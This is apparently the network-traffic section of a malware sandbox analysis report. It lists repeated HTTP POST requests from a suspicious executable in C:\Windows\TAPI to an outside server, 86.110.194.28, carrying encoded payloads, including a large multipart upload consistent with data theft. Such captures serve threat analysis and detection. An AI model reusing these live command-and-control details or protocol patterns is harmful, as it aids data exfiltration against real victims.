                                                                                                                                                                        Jan 3, 2025 07:58:03.339874029 CET2512OUTData Raw: 5b 53 5e 5e 58 5b 50 51 54 5b 59 5a 5b 57 57 53 5f 5d 5a 54 52 5c 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^^X[PQT[YZ[WWS_]ZTR\PBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>!!),V%*+$=Y%<95$.4+4X$7'+)#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:03.675937891 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:03.803553104 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        17192.168.2.44975986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:03.941817999 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:04.292999029 CET2516OUTData Raw: 5b 54 5b 5f 58 5b 50 51 54 5b 59 5a 5b 56 57 58 5f 56 5a 5c 52 54 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[_X[PQT[YZ[VWX_VZ\RTPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<.)]59013=0&,6") ( '/'/??#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:04.617603064 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:04.746752977 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:04 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        18192.168.2.44976086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:04.904695034 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:05.261818886 CET2516OUTData Raw: 5b 5c 5b 5b 58 58 55 5c 54 5b 59 5a 5b 54 57 5e 5f 53 5a 5b 52 55 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[[XXU\T[YZ[TW^_SZ[RUPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E)-!\#);&<E>5$"&?6B"73$$0$U(#Y'$X.-


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        19192.168.2.44976186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:05.346512079 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:05.699254036 CET2000OUTData Raw: 5b 54 5e 59 58 5d 50 50 54 5b 59 5a 5b 52 57 5d 5f 56 5a 58 52 54 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX]PPT[YZ[RW]_VZXRTP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+X-^693&;)04%6"4Q#0]3(0?(#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:06.061213017 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:06.195446968 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:05 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 1e 32 15 36 13 3e 3f 01 5e 26 33 25 5f 22 1e 3b 01 2c 1e 22 08 36 3c 00 00 27 38 33 0f 3d 2e 32 07 28 0d 32 0c 34 2d 2e 0e 3c 20 28 5d 03 10 39 58 28 2e 3c 05 29 3d 36 00 2d 34 38 02 24 37 06 58 3d 33 26 09 31 5a 29 0d 36 13 09 1d 28 23 39 58 27 02 24 5b 3c 30 30 07 25 3d 20 54 0b 17 24 0e 26 20 06 07 25 38 29 58 2a 51 23 02 33 3a 0c 0b 21 2f 3d 0b 20 29 0e 16 2d 20 0f 1e 24 16 0b 57 3e 2d 2f 1d 24 39 32 13 27 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $26>?^&3%_";,"6<'83=.2(24-.< (]9X(.<)=6-48$7X=3&1Z)6(#9X'$[<00%= T$& %8)X*Q#3:!/= )- $W>-/$92';.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        20192.168.2.44976286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:05.513067961 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:05.871100903 CET2516OUTData Raw: 5e 50 5e 51 5d 5c 50 5e 54 5b 59 5a 5b 51 57 5a 5f 56 5a 58 52 5c 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^Q]\P^T[YZ[QWZ_VZXR\PIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D+5<1<$>]>^3-1<6!>#,\',C'? V+9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:06.194315910 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:06.425364971 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
                                                                                                                                                                        Jan 3, 2025 07:58:06.425457001 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        21192.168.2.44976486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:06.571609020 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:06.917990923 CET2516OUTData Raw: 5b 54 5e 5b 5d 5a 50 51 54 5b 59 5a 5b 53 57 5a 5f 51 5a 59 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^[]ZPQT[YZ[SWZ_QZYRSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?"(2<>;&[%4&5P"'> ,3:7'<??#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:58:07.271229029 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.402940989 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
                                                                                                                                                                        Jan 3, 2025 07:58:07.410644054 CET350OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOr
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 169482
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.629832983 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.630057096 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 77 37 7a 64 6b 66 59 46 45 7a 59 32 4b 70 4b 47 51 71 71 7a 72 63 41 64 36 34 6a 76 52 76 51 57 4f 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                                                        Data Ascii: ------w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOrContent-Disposition: form-data; name="0"Content-Type: text/plain^V[_XWPPT[YZ[RW^_QZ_RWPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_
                                                                                                                                                                        Jan 3, 2025 07:58:07.634934902 CET2472OUTData Raw: 75 59 51 5a 31 42 35 75 53 37 57 64 36 46 63 51 53 45 54 48 55 6f 46 41 77 2b 32 2f 72 4f 33 41 30 73 55 50 77 52 4e 5a 75 77 43 68 47 39 58 4d 37 57 43 6c 45 59 4c 69 35 4c 35 35 36 57 6b 5a 56 6e 39 30 76 58 79 43 52 65 33 68 31 7a 43 4d 54 41
                                                                                                                                                                        Data Ascii: uYQZ1B5uS7Wd6FcQSETHUoFAw+2/rO3A0sUPwRNZuwChG9XM7WClEYLi5L556WkZVn90vXyCRe3h1zCMTA6vDPFruh+FHrkQ2oRc2EMgmcR5YtxcWOxUOBgCHTjAuLSwrEojPK8b7ErPvoeHw7fbIPX4G9u99C4EZejKMZS9f5gY40f4QpmwjaNMZj/BNhPYQbDMhuJ66RWQE0Nx1emg0N3Oa9Y9CwjyNKIywOiygCMBiZoqaZb
                                                                                                                                                                        Jan 3, 2025 07:58:07.634993076 CET2472OUTData Raw: 45 37 4e 56 39 72 42 56 61 6d 6b 33 49 7a 67 48 35 75 37 30 6b 45 75 48 4a 32 53 4c 42 71 67 38 71 74 38 74 65 71 4a 63 72 68 77 6a 6d 32 48 64 6a 2f 43 56 33 58 67 35 46 6b 59 43 62 72 58 61 71 66 52 58 37 72 44 56 67 59 4d 73 73 51 62 5a 57 5a
                                                                                                                                                                        Data Ascii: E7NV9rBVamk3IzgH5u70kEuHJ2SLBqg8qt8teqJcrhwjm2Hdj/CV3Xg5FkYCbrXaqfRX7rDVgYMssQbZWZPiyYkKCWDROhJp8joJ2V77C4L4kYZJq92Bco5k5cCb/W6069dVF3/FVlbrsUVLtlWDrpTRl6PlxupQvhwH1cNgkZxYMJZ4vCcBvirHFO4mn04oBqttWUbcZM0vPoQo7tGPfXscoSmZBz65Zk4wxowGbMeTAFXL2dx
                                                                                                                                                                        Jan 3, 2025 07:58:07.635016918 CET4944OUTData Raw: 39 42 33 65 79 75 59 56 4d 52 47 52 4d 49 2f 52 48 4d 55 6d 51 53 6a 68 43 54 70 38 77 64 71 45 48 72 62 33 4d 4a 4e 58 50 79 2b 34 37 6d 32 36 48 4d 37 47 46 53 61 6b 74 37 32 56 57 57 68 70 45 66 6c 36 61 33 71 43 39 6e 31 52 69 4f 42 43 32 73
                                                                                                                                                                        Data Ascii: 9B3eyuYVMRGRMI/RHMUmQSjhCTp8wdqEHrb3MJNXPy+47m26HM7GFSakt72VWWhpEfl6a3qC9n1RiOBC2sW1s+3JRZ1cUSjt8bHLt1me0ot9KadlS5qtbWHql7B75Rj9clX+40duf6UgjtS59t1uodSlT5v0A3cba7sxdOXae7xZ/vWNVSlu3cUlX2fdyxStNit32Lk2y5iuSWx93iq0EV4T43zQPe6RFTscr3Q9sFd6IrJCnIn
                                                                                                                                                                        Jan 3, 2025 07:58:07.635042906 CET2472OUTData Raw: 41 4a 46 4e 66 55 58 33 38 78 78 2f 6d 36 43 75 77 38 6b 69 37 55 76 54 53 47 4f 58 4e 36 73 79 47 47 68 75 47 34 50 47 76 78 6e 5a 2b 67 34 63 4d 42 63 38 70 51 4d 49 41 4c 53 79 45 49 37 2f 63 70 37 49 4b 2f 39 30 70 36 63 56 6a 77 43 62 41 44
                                                                                                                                                                        Data Ascii: AJFNfUX38xx/m6Cuw8ki7UvTSGOXN6syGGhuG4PGvxnZ+g4cMBc8pQMIALSyEI7/cp7IK/90p6cVjwCbADt0+m5/KBa7ZLjN5MG96IKHnxUkQ8SpcTi+vaR+mtrNH60zkqXtGqP70A3UMWcZ1CDGwaACejmXGYBHMKnrDDCXwSD9qp8hDtgMfU9tB0eM+ngabwo7KIL4CxxVdOl3ceKS4V1yREcEmyceOYI9DPGOLLCkFRReNux
                                                                                                                                                                        Jan 3, 2025 07:58:07.635067940 CET2472OUTData Raw: 71 62 63 6d 35 78 54 69 67 42 6b 66 51 63 63 49 49 31 47 36 65 55 74 6b 49 59 74 69 57 58 79 6e 36 65 6e 46 61 57 75 56 73 42 66 33 79 6f 32 79 58 2b 35 54 53 45 4a 42 65 74 32 6f 57 77 52 49 53 35 34 64 57 44 64 74 31 59 64 59 2b 6f 74 49 39 59
                                                                                                                                                                        Data Ascii: qbcm5xTigBkfQccII1G6eUtkIYtiWXyn6enFaWuVsBf3yo2yX+5TSEJBet2oWwRIS54dWDdt1YdY+otI9YK6VwTigGlLwo/SqZ7Og/mISfGcrKQVC2Qv+aPARSXfu1vP/zI+T80f6v3q9hDp/s4n6sRg5+B8UkO1S8xxVPljYUUavoKC8LYYy8/sTv7hYoAmjKfA0+QDX9PgxrgppHvqh2zuKO0HJqbr+52qJwHWOECynO2YyRi
                                                                                                                                                                        Jan 3, 2025 07:58:07.635121107 CET2472OUTData Raw: 6d 71 34 38 44 6e 41 64 30 37 73 78 6d 54 77 64 73 47 65 36 44 6f 6e 56 66 69 36 70 41 4e 47 6f 68 51 6f 56 55 48 44 57 67 6c 39 4e 65 4d 68 69 7a 4c 61 45 79 75 6c 45 77 78 2f 4d 4b 78 33 32 4d 56 4f 63 73 69 56 36 77 55 70 55 6c 45 4a 37 62 38
                                                                                                                                                                        Data Ascii: mq48DnAd07sxmTwdsGe6DonVfi6pANGohQoVUHDWgl9NeMhizLaEyulEwx/MKx32MVOcsiV6wUpUlEJ7b8SiafrNw22Yr/9rVEEFCdwaEkfi2M4DM4ukIr3ai4/+EEY0Jr2P5EIWodvEzA2pwSN7Ki5CCUzpAJa+5AhKXfhlTtPMdbCgitSBBgbSIFW8H/i990jv7bWoZQ/j3EBDtsJTF8CUVqKZFVMaraBRpwWkK2NQ4Z3747F
                                                                                                                                                                        Jan 3, 2025 07:58:07.635138035 CET2472OUTData Raw: 43 35 56 72 2f 74 36 63 58 39 6e 37 66 62 44 48 4a 7a 79 74 6e 41 56 39 34 33 41 56 58 5a 72 38 57 43 76 6c 51 33 38 55 68 38 74 52 6e 6f 43 62 32 32 69 4e 53 33 50 6b 61 35 4b 43 5a 47 2f 2b 54 57 37 61 73 61 49 70 4f 35 64 48 6f 64 44 70 48 43
                                                                                                                                                                        Data Ascii: C5Vr/t6cX9n7fbDHJzytnAV943AVXZr8WCvlQ38Uh8tRnoCb22iNS3Pka5KCZG/+TW7asaIpO5dHodDpHC2aD7HhIi+qUxtjqko11O2uAHTzZvTsXCt7EgVeDVX38lb6DSM6aSYesdJ0f3vdJNLWXr9cl0N3GyqkYgIunLVxYH+1oVT7OGKrt7xJTgfDrajQ0/U295LLlGg+ut2QHJ1FxTw7OXzxW1U/Uy+UolO/kNSv69lElPD
                                                                                                                                                                        Jan 3, 2025 07:58:07.635221004 CET4944OUTData Raw: 70 76 4b 39 37 4c 33 34 75 70 76 76 53 64 67 59 76 39 56 72 44 78 57 4a 64 6a 34 51 35 39 50 6c 6c 53 37 6c 54 30 2f 54 6a 46 36 33 33 30 78 59 68 61 52 5a 58 45 6b 64 53 64 6b 35 35 72 55 46 6c 54 7a 4f 51 75 38 59 4c 69 41 6b 4b 52 33 70 31 70
                                                                                                                                                                        Data Ascii: pvK97L34upvvSdgYv9VrDxWJdj4Q59PllS7lT0/TjF6330xYhaRZXEkdSdk55rUFlTzOQu8YLiAkKR3p1p/8mUTxfhkci/uQU1AgVHBhF4JtOlKL7pCcbrALTn4TDuLX7HbULIZRVWbftnJ30obZ8s/jC+qPROpsMyOhJA/VRnIDZ0SNBFBsPdF1NQMJJqBMoorE3PfMTFNbVXlfi6ASJM6yzwzkCZPkf8yRyG6C9wKAJsy6lZG
                                                                                                                                                                        Jan 3, 2025 07:58:08.246427059 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        22192.168.2.44977086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:07.577133894 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.933615923 CET2516OUTData Raw: 5b 51 5e 5d 58 5f 55 58 54 5b 59 5a 5b 51 57 58 5f 50 5a 5a 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^]X_UXT[YZ[QWX_PZZRRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+-#:,S2<$@>$4'/!W6')V7^#39;&?,(#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:08.265281916 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:08.398668051 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:08 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        23192.168.2.44977686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:08.538908958 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:08.886769056 CET2516OUTData Raw: 5b 51 5b 5d 58 5a 55 5b 54 5b 59 5a 5b 55 57 53 5f 56 5a 58 52 51 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[]XZU[T[YZ[UWS_VZXRQPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(._!*/2((5%':1R"$6#(#%)<D3?$R?9#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:09.228909016 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:09.360850096 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:09 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        24192.168.2.44978586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:09.497911930 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:09.855596066 CET2516OUTData Raw: 5e 51 5b 5c 58 5f 50 51 54 5b 59 5a 5b 5e 57 5e 5f 53 5a 5f 52 50 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
